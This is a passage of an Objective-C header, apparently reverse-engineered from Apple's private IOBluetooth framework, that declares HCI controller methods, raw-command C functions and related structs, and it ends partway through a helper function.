- (int)BluetoothHCILEAdvPacketContentFilterFeatureSectionWrite:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 featureSelection:(unsigned int)arg3 logicalType:(unsigned char)arg4 outLEextOpcode:(char *)arg5 outAction:(char *)arg6;
- (int)BluetoothHCILEBroadcomReadIRKList:(unsigned char)arg1 outLEextOpcode:(char *)arg2 outIRKListIndex:(char *)arg3 outIRK:(char *)arg4 outAddressType:(char *)arg5 outAddress:(struct BluetoothDeviceAddress *)arg6 outResolvedPrivateAddress:(struct BluetoothDeviceAddress *)arg7;
- (int)BluetoothHCILEBroadcomClearIRKList:(char *)arg1 outIRKListAvailableSpace:(char *)arg2;
- (int)BluetoothHCILEBroadcomRemoveIRKFromList:(unsigned char)arg1 address:(struct BluetoothDeviceAddress *)arg2 outLEextOpcode:(char *)arg3 outIRKListAvailableSpace:(char *)arg4;
- (int)BluetoothHCILEBroadcomAddIRKToList:(char *)arg1 addressType:(unsigned char)arg2 address:(struct BluetoothDeviceAddress *)arg3 outLEextOpcode:(char *)arg4 outIRKListAvailableSpace:(char *)arg5;
- (int)BluetoothHCILEBroadcomEnableCustomerSpecificFeatures:(unsigned int)arg1 outLEextOpcode:(char *)arg2;
- (int)readVerboseConfigVersionInfo:(char *)arg1 outTargetID:(char *)arg2 outBaseline:(unsigned short *)arg3 outBuild:(unsigned short *)arg4;
- (int)superPeekPoke:(unsigned char)arg1 address:(unsigned int)arg2 outValue:(unsigned int *)arg3;
- (int)removeHIDEmulationDevice:(struct BluetoothDeviceAddress)arg1;
- (int)readHIDEmulationDevices;
- (int)addHIDEmulationDevice:(struct BluetoothDeviceAddress)arg1 classOfDevice:(unsigned int)arg2 linkKey:(struct BluetoothKey)arg3;
- (int)triStateEnabled:(BOOL)arg1;
- (int)startTransmitTest:(struct BluetoothDeviceAddress *)arg1 hoppingMode:(unsigned char)arg2 frequency:(unsigned char)arg3 modulationType:(unsigned char)arg4 logicalChannel:(unsigned char)arg5 packetType:(unsigned char)arg6 packetLength:(unsigned short)arg7 transmitPower:(unsigned char)arg8 transmitPowerdBm:(unsigned char)arg9 transmitPowerTableIndex:(unsigned char)arg10;
- (int)startReceiveTest:(struct BluetoothDeviceAddress *)arg1 reportPeriod:(unsigned short)arg2 frequency:(unsigned char)arg3 modulationType:(unsigned char)arg4 logicalChannel:(unsigned char)arg5 packetType:(unsigned char)arg6 packetLength:(unsigned short)arg7;
- (int)setTransmitPowerForDevice:(id)arg1 toLevel:(unsigned char)arg2;
- (int)readRawRSSIForDevice:(id)arg1;
- (int)BluetoothHCIBroadcomSetProximityTrigger:(unsigned char)arg1 inEnableAwayTrigger:(unsigned char)arg2;
- (int)BluetoothHCIBroadcomSetProximityTable:(const struct BluetoothDeviceAddress *)arg1 inPowerSteps:(unsigned char)arg2 inAwayTriggerValues:(struct BluetoothBroadcomRSSITriggerValue *)arg3 inPresentTriggerValues:(struct BluetoothBroadcomRSSITriggerValue *)arg4;
- (int)BluetoothHCIBroadcomReadRetransmissionStatus:(unsigned char)arg1 inConnectionHandle:(unsigned short)arg2 inNotificationEnable:(unsigned char)arg3 inNotificationThreshold:(unsigned char)arg4 outConnectionHandle:(unsigned short *)arg5 outRetransmissionCounter:(unsigned int *)arg6 outRetransmissionPercentage:(char *)arg7;
- (int)BluetoothHCIBroadcomIncreaseDecreasePowerLevel:(const struct BluetoothDeviceAddress *)arg1 increase:(unsigned char)arg2;
- (int)BluetoothHCIBroadcomTurnOFFDynamicPowerControl:(unsigned char)arg1 inDeviceAddress:(const struct BluetoothDeviceAddress *)arg2;
- (int)BluetoothHCIBroadcomChangeLNAGainCoexsECI:(unsigned char)arg1;
- (int)BluetoothHCIBroadcomSetUSBAutoResume:(unsigned short)arg1;
- (int)BluetoothHCIBroadcomIgnoreUSBReset:(char *)arg1;
- (int)BluetoothHCIBroadcomGetEDRACLConnectionStats;
- (int)BluetoothHCIBroadcomResetBasicRateACLConnectionStats;
- (int)BluetoothHCIBroadcomGetBasicRateACLConnectionStats;
- (int)BluetoothHCIBroadcomBFCIsConnectionTBFCSuspended:(unsigned short)arg1 outBFCConnectionInfo:(struct BluetoothBroadcomBFCConnectionTBFCSuspendedInfo *)arg2;
- (int)BluetoothHCIBroadcomReadLocalFirmwareInfo:(unsigned char)arg1 outLocalFirmwareInfo:(struct BluetoothBroadcomLocalFirmwareInfo *)arg2;
- (int)BluetoothHCIBroadcomSetEventMask:(const struct BluetoothBroadcomSetEventMask *)arg1;
- (int)BluetoothHCIBroadcomBFCCreateConnection:(const struct BluetoothDeviceAddress *)arg1 inPacketType:(unsigned short)arg2 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg3;
- (int)BluetoothHCIBroadcomBFCReadScanEnable:(char *)arg1;
- (int)BluetoothHCIBroadcomBFCWriteScanEnable:(unsigned char)arg1;
- (int)BluetoothHCIBroadcomBFCReadRemoteBPCSFeatures:(unsigned short)arg1 outBPCSFeatures:(struct BluetoothBroadcomBFCRemoteBPCSFeatures *)arg2;
- (int)BluetoothHCIBroadcomSetTransmitPower:(unsigned short)arg1 inPower:(BOOL)arg2;
- (int)BluetoothHCIBroadcomBFCSetParams:(struct BluetoothBroadcomBFCParams *)arg1;
- (int)BluetoothHCIBroadcomBFCReadParams:(struct BluetoothBroadcomBFCParams *)arg1;
- (int)BluetoothHCIBroadcomBFCResume:(unsigned short)arg1 inDeviceAddress:(const struct BluetoothDeviceAddress *)arg2 inBFCResume:(struct BluetoothBroadcomBFCReconnectData *)arg3;
- (int)BluetoothHCIBroadcomBFCSuspend:(unsigned short)arg1;
- (int)BluetoothHCIBroadcomReadRawRSSI:(unsigned short)arg1 outRSSI:(char *)arg2;
- (int)BluetoothHCIAtherosReadRawRSSI:(const struct BluetoothDeviceAddress *)arg1 outRSSI:(char *)arg2;
- (int)BluetoothHCICSRReadRawRSSI:(unsigned short)arg1 outRSSI:(char *)arg2;
- (BOOL)isLEASupported;
- (BOOL)pairedDeviceSupportTBFCPage;
- (BOOL)tbfcPageSupported;
- (BOOL)tbfcSupported;
- (BOOL)concurrentCreateConnectionSupported;
- (struct BluetoothHCISupportedFeatures)supportedFeatures;
- (id)cachedDeviceAddressString;
- (id)cachedDeviceAddress;
- (unsigned char)cachedHCIVersion;
- (BOOL)lowEnergySupported;
- (int)setPowerState:(int)arg1;
@property(readonly) int powerState;
- (BOOL)powerChangeSupported;
- (int)BluetoothHCILETestEnd:(unsigned short *)arg1;
- (int)BluetoothHCILETransmitterTest:(unsigned char)arg1 lengthOfTestData:(unsigned char)arg2 packetPayload:(unsigned char)arg3;
- (int)BluetoothHCILEReceiverTest:(unsigned char)arg1;
- (int)BluetoothHCILEReadSupportedStates:(unsigned long long *)arg1;
- (int)BluetoothHCILELongTermKeyRequestNegativeReply:(unsigned short)arg1;
- (int)BluetoothHCILELongTermKeyRequestReply:(unsigned short)arg1 longTermKey:(char *)arg2;
- (int)BluetoothHCILEStartEncryption:(unsigned short)arg1 randomNumber:(unsigned long long)arg2 encryptedDiversifier:(unsigned short)arg3 longTermKey:(char *)arg4;
- (int)BluetoothHCILERand:(unsigned long long *)arg1;
- (int)BluetoothHCILEEncrypt:(char *)arg1 plaintextData:(char *)arg2 encryptedData:(char *)arg3;
- (int)BluetoothHCILEReadRemoteUsedFeatures:(unsigned short)arg1;
- (int)BluetoothHCILEReadChannelMap:(unsigned short)arg1 channelMap:(unsigned long long *)arg2;
- (int)BluetoothHCILESetHostChannelClassification:(unsigned long long)arg1;
- (int)BluetoothHCILEConnectionUpdate:(unsigned short)arg1 connectionIntervalMin:(unsigned short)arg2 connectionIntervalMax:(unsigned short)arg3 connectionLatency:(unsigned short)arg4 supervisionTimeout:(unsigned short)arg5 minimumCELength:(unsigned short)arg6 maximumCELength:(unsigned short)arg7;
- (int)BluetoothHCILERemoveDeviceFromWhiteList:(unsigned char)arg1 address:(const struct BluetoothDeviceAddress *)arg2;
- (int)BluetoothHCILEAddDeviceToWhiteList:(unsigned char)arg1 address:(const struct BluetoothDeviceAddress *)arg2;
- (int)BluetoothHCILEClearWhiteList;
- (int)BluetoothHCILEReadWhiteListSize:(char *)arg1;
- (int)BluetoothHCILECreateConnectionCancel;
- (int)BluetoothHCILECreateConnection:(unsigned short)arg1 LEScanWindow:(unsigned short)arg2 initiatorFilterPolicy:(unsigned char)arg3 peerAddressType:(unsigned char)arg4 peerAddress:(struct BluetoothDeviceAddress *)arg5 ownAddressType:(unsigned char)arg6 connectionIntervalMin:(unsigned short)arg7 connectionIntervalMax:(unsigned short)arg8 connectionLatency:(unsigned short)arg9 supervisionTimeout:(unsigned short)arg10 minimumCELength:(unsigned short)arg11 maximumCELength:(unsigned short)arg12;
- (int)BluetoothHCILESetScanEnable:(unsigned char)arg1 filterDuplicates:(unsigned char)arg2;
- (int)BluetoothHCILESetScanParameters:(unsigned char)arg1 LEScanInterval:(unsigned short)arg2 LEScanWindow:(unsigned short)arg3 ownAddressType:(unsigned char)arg4 scanningFilterPolicy:(unsigned char)arg5;
- (int)BluetoothHCILESetAdvertiseEnable:(unsigned char)arg1;
- (int)BluetoothHCILESetScanResponseData:(unsigned char)arg1 scanResponseData:(char *)arg2;
- (int)BluetoothHCILESetAdvertisingData:(unsigned char)arg1 advertsingData:(char *)arg2;
- (int)BluetoothHCILEReadAdvertisingChannelTxPower:(char *)arg1;
- (int)BluetoothHCILESetAdvertisingParameters:(unsigned short)arg1 advertisingIntervalMax:(unsigned short)arg2 advertisingType:(unsigned char)arg3 ownAddressType:(unsigned char)arg4 directAddressType:(unsigned char)arg5 directAddress:(struct BluetoothDeviceAddress *)arg6 advertisingChannelMap:(unsigned char)arg7 advertisingFilterPolicy:(unsigned char)arg8;
- (int)BluetoothHCILESetRandomAddress:(struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCILEReadLocalSupportedFeatures:(unsigned long long *)arg1;
- (int)BluetoothHCILEReadBufferSize:(unsigned short *)arg1 totalNumberLEDataPackets:(char *)arg2;
- (int)BluetoothHCILESetEventMask:(unsigned long long)arg1;
- (void)BluetoothHCIEventNotification:(const struct IOBluetoothHCIEventNotificationMessage *)arg1;
- (int)BluetoothHCIWriteSimplePairingDebugMode:(unsigned char)arg1;
- (int)BluetoothHCIEnableDeviceUnderTestMode;
- (int)BluetoothHCIWriteLoopbackMode:(unsigned char)arg1;
- (int)BluetoothHCIReadLoopbackMode:(char *)arg1;
- (int)BluetoothHCIReadClock:(unsigned short)arg1 inWhichClock:(unsigned char)arg2 outReadClockInfo:(struct BluetoothReadClockInfo *)arg3;
- (int)BluetoothHCIReadAFHChannelMap:(unsigned short)arg1 outAFHMode:(char *)arg2 outAFHChannelMap:(unsigned char [10])arg3;
- (int)BluetoothHCIReadRSSI:(unsigned short)arg1 outRSSI:(char *)arg2;
- (int)BluetoothHCIReadLinkQuality:(unsigned short)arg1 outLinkQuality:(char *)arg2;
- (int)BluetoothHCIResetFailedContactCounter:(unsigned short)arg1;
- (int)BluetoothHCIReadFailedContactCounter:(unsigned short)arg1 outFailedContactCounter:(unsigned short *)arg2;
- (int)BluetoothHCIReadDeviceAddress:(struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIReadBufferSize:(unsigned short *)arg1 outHCSynchronousDataPacketLength:(char *)arg2 outHCTotalNumACLDataPackets:(unsigned short *)arg3 outHCTotalNumSynchronousDataPackets:(unsigned short *)arg4;
- (int)BluetoothHCIReadLocalExtendedFeatures:(unsigned char)arg1 outMaximumPageNumber:(char *)arg2 outExtendedLMPFeatures:(struct BluetoothHCISupportedFeatures *)arg3;
- (int)BluetoothHCIReadLocalSupportedFeatures:(struct BluetoothHCISupportedFeatures *)arg1;
- (int)BluetoothHCIReadLocalSupportedCommands:(struct BluetoothHCISupportedCommands *)arg1;
- (int)BluetoothHCIReadLocalVersionInformation:(char *)arg1 outHCIRevision:(unsigned short *)arg2 outLMPVersion:(char *)arg3 outManufacturerName:(unsigned short *)arg4 outLMPSubversion:(unsigned short *)arg5;
- (int)BluetoothHCIWriteLEHostSupported:(unsigned char)arg1 simultaneousLEHost:(unsigned char)arg2;
- (int)BluetoothHCIReadLEHostSupported:(char *)arg1 simultaneousLEHost:(char *)arg2;
- (int)BluetoothHCIEnhancedFlush:(unsigned short)arg1 inPacketType:(unsigned char)arg2 outConnectionHandle:(unsigned short *)arg3;
- (int)BluetoothHCIWriteDefaultErroneousDataReporting:(unsigned char)arg1;
- (int)BluetoothHCIReadDefaultErroneousDataReporting:(char *)arg1;
- (int)BluetoothHCISendKeypressNotification:(const struct BluetoothDeviceAddress *)arg1 inNotificationType:(unsigned char)arg2;
- (int)BluetoothHCIWriteInquiryTransmitPowerLevel:(BOOL)arg1;
- (int)BluetoothHCIReadInquiryResponseTransmitPowerLevel:(char *)arg1;
- (int)BluetoothHCIReadLocalOOBData:(struct BluetoothHCISimplePairingOOBData *)arg1 outR:(struct BluetoothHCISimplePairingOOBData *)arg2;
- (int)BluetoothHCIWriteSimplePairingMode:(unsigned char)arg1;
- (int)BluetoothHCIReadSimplePairingMode:(char *)arg1;
- (int)BluetoothHCIRefreshEncryptionKey:(unsigned short)arg1 outRefreshEncryptionKeyResults:(struct BluetoothHCIEventEncryptionKeyRefreshCompleteResults *)arg2;
- (int)BluetoothHCIWriteExtendedInquiryResponse:(unsigned char)arg1 inExtendedInquiryResponse:(const struct BluetoothHCIExtendedInquiryResponse *)arg2;
- (int)BluetoothHCIReadExtendedInquiryResponse:(char *)arg1 outExtendedInquiryResponse:(struct BluetoothHCIExtendedInquiryResponse *)arg2;
- (int)BluetoothHCIWriteAFHChannelAssessmentMode:(unsigned char)arg1;
- (int)BluetoothHCIReadAFHChannelAssessmentMode:(char *)arg1;
- (int)BluetoothHCIWritePageScanType:(unsigned char)arg1;
- (int)BluetoothHCIReadPageScanType:(char *)arg1;
- (int)BluetoothHCIWriteInquiryMode:(unsigned char)arg1;
- (int)BluetoothHCIReadInquiryMode:(char *)arg1;
- (int)BluetoothHCIWriteInquiryScanType:(unsigned char)arg1;
- (int)BluetoothHCIReadInquiryScanType:(char *)arg1;
- (int)BluetoothHCISetAFHHostChannelClassification:(const struct BluetoothAFHHostChannelClassification *)arg1;
- (int)BluetoothHCIWriteCurrentIACLAP:(const struct BluetoothHCICurrentInquiryAccessCodes *)arg1;
- (int)BluetoothHCIReadCurrentIACLAP:(struct BluetoothHCICurrentInquiryAccessCodes *)arg1;
- (int)BluetoothHCIReadNumberOfSupportedIAC:(char *)arg1;
- (int)BluetoothHCIWriteLinkSupervisionTimeout:(unsigned short)arg1 inLinkSupervisionTimeout:(unsigned short)arg2;
- (int)BluetoothHCIReadLinkSupervisionTimeout:(unsigned short)arg1 outLinkSupervisionTimeout:(unsigned short *)arg2;
- (int)BluetoothHCIHostNumberOfCompletedPackets:(unsigned char)arg1 inHandle:(const unsigned short *)arg2 inHostNumOfCompletedPackets:(const unsigned short *)arg3;
- (int)BluetoothHCIHostBufferSize:(unsigned short)arg1 inHostSynchronousDataPacketLength:(unsigned char)arg2 inHostTotalNumACLDataPackets:(unsigned short)arg3 inHostTotalNumSynchronousDataPackets:(unsigned short)arg4;
- (int)BluetoothHCISetControllerToHostFlowControl:(unsigned char)arg1;
- (int)BluetoothHCIWriteSynchronousFlowControlEnable:(unsigned char)arg1;
- (int)BluetoothHCIReadSynchronousFlowControlEnable:(char *)arg1;
- (int)BluetoothHCIReadTransmitPowerLevel:(unsigned short)arg1 inType:(unsigned char)arg2 outTransmitPowerLevel:(char *)arg3;
- (int)BluetoothHCIWriteHoldModeActivity:(unsigned char)arg1;
- (int)BluetoothHCIReadHoldModeActivity:(char *)arg1;
- (int)BluetoothHCIWriteNumBroadcastRetransmissions:(unsigned char)arg1;
- (int)BluetoothHCIReadNumBroadcastRetransmissions:(char *)arg1;
- (int)BluetoothHCIWriteAutomaticFlushTimeout:(unsigned short)arg1 inFlushTimeout:(unsigned short)arg2;
- (int)BluetoothHCIReadAutomaticFlushTimeout:(unsigned short)arg1 outFlushTimeout:(unsigned short *)arg2;
- (int)BluetoothHCIWriteVoiceSetting:(unsigned short)arg1;
- (int)BluetoothHCIReadVoiceSetting:(unsigned short *)arg1;
- (int)BluetoothHCIWriteClassOfDevice:(unsigned int)arg1;
- (int)BluetoothHCIReadClassOfDevice:(unsigned int *)arg1;
- (int)BluetoothHCIWriteAuthenticationEnable:(unsigned char)arg1;
- (int)BluetoothHCIReadAuthenticationEnable:(char *)arg1;
- (int)BluetoothHCIWriteInquiryScanActivity:(unsigned short)arg1 inInquiryScanWindow:(unsigned short)arg2;
- (int)BluetoothHCIReadInquiryScanActivity:(unsigned short *)arg1 outInquiryScanWindow:(unsigned short *)arg2;
- (int)BluetoothHCIWritePageScanActivity:(unsigned short)arg1 inPageScanWindow:(unsigned short)arg2;
- (int)BluetoothHCIReadPageScanActivity:(unsigned short *)arg1 outPageScanWindow:(unsigned short *)arg2;
- (int)BluetoothHCIWriteScanEnable:(unsigned char)arg1;
- (int)BluetoothHCIReadScanEnable:(char *)arg1;
- (int)BluetoothHCIWritePageTimeout:(unsigned short)arg1;
- (int)BluetoothHCIReadPageTimeout:(unsigned short *)arg1;
- (int)BluetoothHCIWriteConnectionAcceptTimeout:(unsigned short)arg1;
- (int)BluetoothHCIReadConnectionAcceptTimeout:(unsigned short *)arg1;
- (int)BluetoothHCIReadLocalName:(unsigned char [256])arg1;
- (int)BluetoothHCIWriteLocalName:(unsigned char [256])arg1;
- (int)BluetoothHCIDeleteStoredLinkKey:(const struct BluetoothDeviceAddress *)arg1 inDeleteAllFlag:(unsigned char)arg2 outNumKeysDeleted:(unsigned short *)arg3;
- (int)BluetoothHCIWriteStoredLinkKey:(unsigned int)arg1 inDeviceAddress:(const struct BluetoothDeviceAddress *)arg2 inLinkKey:(const struct BluetoothKey *)arg3 outNumKeysWritten:(char *)arg4;
- (int)BluetoothHCIReadStoredLinkKey:(const struct BluetoothDeviceAddress *)arg1 inReadAllFlag:(unsigned char)arg2 outStoredLinkKeysInfo:(struct BluetoothHCIStoredLinkKeysInfo *)arg3;
- (int)BluetoothHCICreateNewUnitKey;
- (int)BluetoothHCIWritePINType:(unsigned char)arg1;
- (int)BluetoothHCIReadPINType:(char *)arg1;
- (int)BluetoothHCIFlush:(unsigned short)arg1;
- (int)BluetoothHCISetEventFilter:(unsigned char)arg1 inFilterConditionType:(unsigned char)arg2 inCondition:(struct BluetoothEventFilterCondition *)arg3;
- (int)BluetoothHCIReset;
- (int)BluetoothHCISetEventMask:(const struct BluetoothSetEventMask *)arg1;
- (int)BluetoothHCISniffSubrating:(unsigned short)arg1 inMaximumLatency:(unsigned short)arg2 inMinimumRemoteTimeout:(unsigned short)arg3 inMinimumLocalTimeout:(unsigned short)arg4 outConnectionHandle:(unsigned short *)arg5;
- (int)BluetoothHCIFlowSpecification:(struct BluetoothHCIEventFlowSpecificationData *)arg1 outFlowSpecificationCompleteResults:(struct BluetoothHCIEventFlowSpecificationData *)arg2;
- (int)BluetoothHCIWriteDefaultLinkPolicySettings:(unsigned short)arg1;
- (int)BluetoothHCIReadDefaultLinkPolicySettings:(unsigned short *)arg1;
- (int)BluetoothHCIWriteLinkPolicySettings:(unsigned short)arg1 inLinkPolicySettings:(unsigned short)arg2;
- (int)BluetoothHCIReadLinkPolicySettings:(unsigned short)arg1 outLinkPolicySettings:(unsigned short *)arg2;
- (int)BluetoothHCISwitchRole:(const struct BluetoothDeviceAddress *)arg1 inRole:(unsigned char)arg2 outRoleChangeResults:(struct BluetoothHCIEventRoleChangeResults *)arg3;
- (int)BluetoothHCIRoleDiscovery:(unsigned short)arg1 outCurrentRole:(char *)arg2;
- (int)BluetoothHCIQoSSetup:(unsigned short)arg1 inFlags:(unsigned char)arg2 inServiceType:(unsigned char)arg3 inTokenRate:(unsigned int)arg4 inPeakBandwidth:(unsigned int)arg5 inLatency:(unsigned int)arg6 inDelayVariation:(unsigned int)arg7 outQoSSetupCompleteResults:(struct BluetoothHCIEventQoSSetupCompleteResults *)arg8;
- (int)BluetoothHCIExitParkState:(unsigned short)arg1 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg2;
- (int)BluetoothHCIParkState:(unsigned short)arg1 inBeaconMaxInterval:(unsigned short)arg2 inBeaconMinInterval:(unsigned short)arg3 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg4;
- (int)BluetoothHCIExitSniffMode:(unsigned short)arg1 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg2;
- (int)BluetoothHCISniffMode:(unsigned short)arg1 inSniffMaxInterval:(unsigned short)arg2 inSniffMinInterval:(unsigned short)arg3 inSniffAttempt:(unsigned short)arg4 inSniffTimeout:(unsigned short)arg5 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg6;
- (int)BluetoothHCIHoldMode:(unsigned short)arg1 inHoldModeMaxInterval:(unsigned short)arg2 inHoldModeMinInterval:(unsigned short)arg3 outModeChangeResults:(struct BluetoothHCIEventModeChangeResults *)arg4;
- (int)BluetoothHCIIOCapabilityRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1 inReason:(unsigned char)arg2;
- (int)BluetoothHCIRemoteOOBDataRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIRemoteOOBDataRequestReply:(const struct BluetoothDeviceAddress *)arg1 inC:(const struct BluetoothHCISimplePairingOOBData *)arg2 inR:(const struct BluetoothHCISimplePairingOOBData *)arg3;
- (int)BluetoothHCIUserPasskeyRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIUserPasskeyRequestReply:(const struct BluetoothDeviceAddress *)arg1 inNumericValue:(unsigned int)arg2;
- (int)BluetoothHCIUserConfirmationRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIUserConfirmationRequestReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIIOCapabilityRequestReply:(const struct BluetoothDeviceAddress *)arg1 inIOCapability:(unsigned char)arg2 inOOBDataPresent:(unsigned char)arg3 inAuthenticationRequirements:(unsigned char)arg4;
- (int)BluetoothHCIRejectSynchronousConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inReason:(unsigned char)arg2 outSynchronousConnectionCompleteResults:(struct BluetoothHCIEventSynchronousConnectionCompleteResults *)arg3;
- (int)BluetoothHCIAcceptSynchronousConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inTransmitBandwidth:(unsigned int)arg2 inReceiveBandwidth:(unsigned int)arg3 inMaxLatency:(unsigned short)arg4 inContentFormat:(unsigned short)arg5 inRetransmissionEffort:(unsigned char)arg6 inPacketType:(unsigned short)arg7 outSynchronousConnectionCompleteResults:(struct BluetoothHCIEventSynchronousConnectionCompleteResults *)arg8;
- (int)BluetoothHCISetupSynchronousConnection:(unsigned short)arg1 inTransmitBandwidth:(unsigned int)arg2 inReceiveBandwidth:(unsigned int)arg3 inMaxLatency:(unsigned short)arg4 inVoiceSetting:(unsigned short)arg5 inRetransmissionEffort:(unsigned char)arg6 inPacketType:(unsigned short)arg7 outSynchronousConnectionCompleteResults:(struct BluetoothHCIEventSynchronousConnectionCompleteResults *)arg8;
- (int)BluetoothHCIReadLMPHandle:(unsigned short)arg1 outReadLMPHandleResults:(struct BluetoothHCIReadLMPHandleResults *)arg2;
- (int)BluetoothHCIReadClockOffset:(unsigned short)arg1 outReadClockOffsetCompleteResults:(unsigned short *)arg2;
- (int)BluetoothHCIReadRemoteVersionInformation:(unsigned short)arg1 outReadRemoteVersionInformationCompleteResults:(struct BluetoothHCIEventReadRemoteVersionInfoResults *)arg2;
- (int)BluetoothHCIReadRemoteExtendedFeatures:(unsigned short)arg1 inPageNumber:(unsigned char)arg2 outReadRemoteExtendedFeaturesCompleteResults:(struct BluetoothHCIEventReadRemoteExtendedFeaturesResults *)arg3;
- (int)BluetoothHCIReadRemoteSupportedFeatures:(unsigned short)arg1 outReadRemoteSupportedFeaturesCompleteResults:(struct BluetoothHCIEventReadRemoteSupportedFeaturesResults *)arg2;
- (int)BluetoothHCIRemoteNameRequestCancel:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIRemoteNameRequest:(const struct BluetoothDeviceAddress *)arg1 inPageScanRepetitionMode:(unsigned char)arg2 inReserved:(unsigned char)arg3 inClockOffset:(unsigned short)arg4 outRemoteNameRequestCompleteResults:(struct BluetoothHCIEventRemoteNameRequestResults *)arg5;
- (int)BluetoothHCIMasterLinkKey:(unsigned char)arg1 outMasterLinkKeyCompleteResults:(struct BluetoothHCIEventMasterLinkKeyCompleteResults *)arg2;
- (int)BluetoothHCIChangeConnectionLinkKey:(unsigned short)arg1 outChangeConnectionLinkKeyCompleteResults:(struct BluetoothHCIEventChangeConnectionLinkKeyCompleteResults *)arg2;
- (int)BluetoothHCISetConnectionEncryption:(unsigned short)arg1 inEncryptionEnable:(unsigned char)arg2 outEncryptionChangeResults:(struct BluetoothHCIEventEncryptionChangeResults *)arg3;
- (int)BluetoothHCIAuthenticationRequested:(unsigned short)arg1 outAuthenticationCompleteResults:(struct BluetoothHCIEventAuthenticationCompleteResults *)arg2;
- (int)BluetoothHCIChangeConnectionPacketType:(unsigned short)arg1 inPacketType:(unsigned short)arg2 outConnectionPacketTypeChangedResults:(struct BluetoothHCIEventConnectionPacketTypeResults *)arg3;
- (int)BluetoothHCIPINCodeRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIPINCodeRequestReply:(const struct BluetoothDeviceAddress *)arg1 inPINCodeLength:(unsigned long long)arg2 inPINCode:(const struct BluetoothPINCode *)arg3;
- (int)BluetoothHCILinkKeyRequestNegativeReply:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCILinkKeyRequestReply:(const struct BluetoothDeviceAddress *)arg1 inLinkKey:(const struct BluetoothKey *)arg2;
- (int)BluetoothHCIRejectConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inReason:(unsigned char)arg2 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg3;
- (int)BluetoothHCIAcceptConnectionRequest:(const struct BluetoothDeviceAddress *)arg1 inRole:(unsigned char)arg2 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg3;
- (int)BluetoothHCICreateConnectionCancel:(const struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIDisconnect:(unsigned short)arg1 inReason:(unsigned char)arg2 outDisconnectionCompleteResults:(struct BluetoothHCIEventDisconnectionCompleteResults *)arg3;
- (int)BluetoothHCICreateConnection:(const struct BluetoothDeviceAddress *)arg1 inPacketType:(unsigned short)arg2 inPageScanRepetitionMode:(unsigned char)arg3 inReserved:(unsigned char)arg4 inClockOffset:(unsigned short)arg5 inAllowRoleSwitch:(unsigned char)arg6 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg7;
- (int)BluetoothHCIExitPeriodicInquiryMode;
- (int)BluetoothHCIPeriodicInquiryMode:(unsigned char)arg1 inMinPeriodLength:(unsigned char)arg2 inLAP:(unsigned int)arg3 inInquiryLength:(unsigned char)arg4 inNumResponses:(unsigned char)arg5 outInquiryResults:(struct BluetoothHCIInquiryResults *)arg6;
- (int)BluetoothHCIInquiryCancel;
- (int)BluetoothHCIInquiry:(unsigned int)arg1 inInquiryLength:(unsigned char)arg2 inNumResponses:(unsigned char)arg3 outInquiryResults:(struct BluetoothHCIInquiryResults *)arg4;
- (void)releaseRequest:(unsigned int)arg1;
- (unsigned int)requestWithTimeout:(int)arg1 isSynchronous:(BOOL)arg2 device:(id)arg3;
- (int)setClassOfDevice:(unsigned int)arg1 forTimeInterval:(double)arg2;
- (unsigned int)classOfDevice;
- (unsigned short)USBVendorID;
- (unsigned short)USBProductID;
- (int)configState;
- (unsigned int)featureFlags;
- (int)getAddress:(struct BluetoothDeviceAddress *)arg1;
- (id)nameAsString;
- (id)addressAsString;
- (int)setProperty:(id)arg1 forKey:(id)arg2;
- (int)enableRemoteWake:(BOOL)arg1;
- (int)softwareVersion:(struct NumVersion *)arg1 firmwareVersion:(struct BluetoothHCIVersionInfo *)arg2;
- (int)getControllerManufacturerName;
- (int)getDiagnosticInfo;
- (BOOL)isReady;
- (void)finalize;
- (void)dealloc;
- (id)init;
@end
#pragma mark - Private IOBluetooth Functions
struct IOBluetoothHCIDispatchParams {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
struct BluetoothHCIUserClientNotificationDataInfo {
unsigned long long _field1;
unsigned long long _field2;
struct BluetoothHCIRequestCallbackInfo _field3;
unsigned int parameterSize;
unsigned int _field5;
unsigned short opcode;
unsigned char _field7;
unsigned char _field8;
unsigned char _field9;
unsigned char _field10;
unsigned char _field11;
unsigned char _field12;
};
struct IOBluetoothHCIEventNotificationMessage {
struct BluetoothHCIUserClientNotificationDataInfo dataInfo;
void *eventParameterBytes;
};
int BluetoothHCIRequestCreate(uint32_t *request, int timeout, void* arg3, size_t arg4);
int BluetoothHCIRequestDelete(uint32_t request);
int BluetoothHCISendRawCommand(uint32_t request,
void *commandData,
size_t commmandSize);
int BluetoothHCISendRawACLData(void *commandData,
size_t commandSize,
uint32_t handle,
uint32_t request);
int BluetoothHCIDispatchUserClientRoutine(struct IOBluetoothHCIDispatchParams *arguments,
unsigned char *returnValue,
size_t *returnValueSize);
#pragma mark - Helper Methods
/**
Data object for notification message.
*/
static inline NSData * IOBluetoothHCIEventParameterData(IOBluetoothHCIEventNotificationMessageRef message)
//__attribute__((swift_name("getter:IOBluetoothHCIEventNotificationMessageRef.eventParameterData(self:)")))
{
size_t size = message->dataInfo.parameterSize;
